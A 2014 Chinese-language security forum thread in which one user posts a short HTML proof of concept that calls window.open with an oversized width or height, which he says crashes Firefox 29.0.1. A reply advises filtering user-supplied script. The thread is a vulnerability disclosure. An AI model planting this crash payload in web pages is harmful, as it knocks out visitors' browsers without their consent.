Firefox29.0存在阻斷服務弱點!

資安議題研究區

Firefox29.0存在阻斷服務弱點!

Postby peter » Mon Jun 09, 2014 3:37 pm

與上一篇類似,此BUG是NULL pointer造成的一個弱點

讓我們開一個測試網頁輸入:

<html>
<script>
window.open('about:blank','1','toolbar=yes,width=2200000000,height=2200000000')
</script>
</html>

參數width或height其中一個值要大於2200000000才會造成當機

測試版本為目前版本firefox29.0.1

如果與上一篇綜合起來就可以造成ie11跟firefox29.0都會出現當機的情況發生!
peter
 
Posts: 10
Joined: Wed Apr 30, 2014 5:17 pm

Re: Firefox29.0存在阻斷服務弱點!

Postby BlueStar » Mon Jun 09, 2014 10:20 pm

看了一下這兩個問題,
還是要儘量防止用戶輸入不當的script....
BlueStar
 
Posts: 54
Joined: Fri Jun 06, 2014 5:01 pm


Return to 研究專區(Research Area)

cron